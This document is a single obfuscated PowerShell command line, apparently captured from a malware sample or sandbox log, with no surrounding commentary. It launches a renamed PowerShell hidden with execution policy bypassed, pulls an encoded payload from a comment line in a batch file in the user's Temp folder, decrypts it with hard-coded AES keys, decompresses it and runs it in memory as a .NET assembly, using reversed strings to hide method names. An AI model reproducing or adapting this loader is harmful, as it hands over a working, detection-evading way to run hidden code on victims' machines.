"getrnr.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $_CASH_JiNoS = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\getrnr.bat').Split([Environment]::NewLine);foreach ($_CASH_Xcoxe in $_CASH_JiNoS) { if ($_CASH_Xcoxe.StartsWith(':: @')) { $_CASH_rknXM = $_CASH_Xcoxe.Substring(4); break; }; };$_CASH_rknXM = [System.Text.RegularExpressions.Regex]::Replace($_CASH_rknXM, '_CASH_', '');$_CASH_DIvnK = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($_CASH_rknXM);$_CASH_CznMv = New-Object System.Security.Cryptography.AesManaged;$_CASH_CznMv.Mode = [System.Security.Cryptography.CipherMode]::CBC;$_CASH_CznMv.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$_CASH_CznMv.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zEFw90YEtbw7ZpTxvvNz6EhXoNPmBL+mwZ3UVM6DVaM=');$_CASH_CznMv.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ozT1pR8RbqxqWOY1oBL98w==');$_CASH_bMTfl = $_CASH_CznMv.CreateDecryptor();$_CASH_DIvnK = $_CASH_bMTfl.TransformFinalBlock($_CASH_DIvnK, 0, $_CASH_DIvnK.Length);$_CASH_bMTfl.Dispose();$_CASH_CznMv.Dispose();$_CASH_TDSoU = New-Object System.IO.MemoryStream(, $_CASH_DIvnK);$_CASH_NcZjV = New-Object System.IO.MemoryStream;$_CASH_sJaCx = New-Object System.IO.Compression.GZipStream($_CASH_TDSoU, [IO.Compression.CompressionMode]::Decompress);$_CASH_sJaCx.CopyTo($_CASH_NcZjV);$_CASH_sJaCx.Dispose();$_CASH_TDSoU.Dispose();$_CASH_NcZjV.Dispose();$_CASH_DIvnK = $_CASH_NcZjV.ToArray();$_CASH_cXtdN = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($_CASH_DIvnK);$_CASH_dJxRg = $_CASH_cXtdN.EntryPoint;$_CASH_dJxRg.Invoke($null, (, [string[]] ('')))